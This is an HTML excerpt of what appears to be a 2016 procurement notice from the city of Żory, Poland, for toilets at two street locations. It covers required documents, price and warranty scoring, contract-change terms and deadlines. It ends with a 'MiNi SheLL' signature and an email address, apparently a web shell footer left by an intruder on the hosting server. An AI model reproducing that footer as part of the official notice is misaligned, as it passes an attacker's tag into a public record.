III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Koncepcje oferowanych obiektów dla każdej lokalizacji (1 koncepcję dla obiektu przy ul. Folwareckiej oraz 1 koncepcję obiektu przy ul. Bramkowej) zawierające w szczególności rzut przyziemia, przekrój, elewacje i opis techniczny. Z koncepcji musi wynikać, że oferowana toaleta jest zgodna z punktem 3 SIWZ. Jest to dokument (oświadczenie), o którym mowa w art. 25 ust. 1 pkt 2 ustawy pzp, składany w celu potwierdzenia spełniania (przez oferowane dostawy) wymagań, określonych przez Zamawiającego w tym postępowaniu. Oznacza to, że ten dokument (oświadczenie) może podlegać uzupełnieniu w trybie art. 26 ust. 3 ustawy pzp lub też wyjaśnieniom w trybie art. 26 ust. 4 ustawy pzp.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument potwierdzający ten fakt - (jeżeli Wykonawca polega na zasobach innych podmiotów). 
Oświadczenie Wykonawcy dotyczące obowiązku podatkowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji (36,48,60 miesięcy) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidują możliwość dokonania istotnych zmian postanowień zawartej umowy w niżej opisanych przypadkach: 
1. Zmiana przepisów o podatku od towarów i usług - zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT 
2. Wstrzymanie dostawy i montażu przez Zamawiającego lub właściwy organ z przyczyn niezawinionych przez Wykonawcę - Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót. 
3. Wydłużająca się powyżej 40 dni procedura uzyskania decyzji o pozwoleniu na budowę - Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile o ile wydłużyła się procedura uzyskania decyzji o pozwoleniu na budowę (powyżej 40 dni od daty złożenia wniosku) 
4. Wydłużająca się powyżej 30 dni procedura uzyskania decyzji o zezwoleniu na prowadzenie robót przy zabytku - dotyczy zadania 2 - Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile o ile wydłużyła się procedura uzyskania decyzji o zezwoleniu na prowadzenie robót przy zabytku (powyżej 30 dni od daty złożenia wniosku).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zory.pl/?c=7074<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 12:00, miejsce: Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, informacja - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena - zostanie zastosowany następujący wzór arytmetyczny:
(n : b) x 95 
Oferta z najniższą ceną otrzyma 95 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 95 - wskaźnik stały,

w kryterium 2 ocena punktowa w kryterium okres gwarancji przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej 36 miesięcy			- 0 punktów
2)	za udzielenie gwarancji wynoszącej 48 miesięcy			- 1 punkt 
3)	za udzielenie gwarancji wynoszącej 60 miesięcy			- 5 punktów 

W niniejszym kryterium Wykonawca może uzyskać maksymalnie 5 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy 
(w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp). Zaoferowanie okresu gwarancyjnego dłuższego niż 60 miesięcy nie spowoduje, że Zamawiający przyzna więcej niż 5 pkt..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com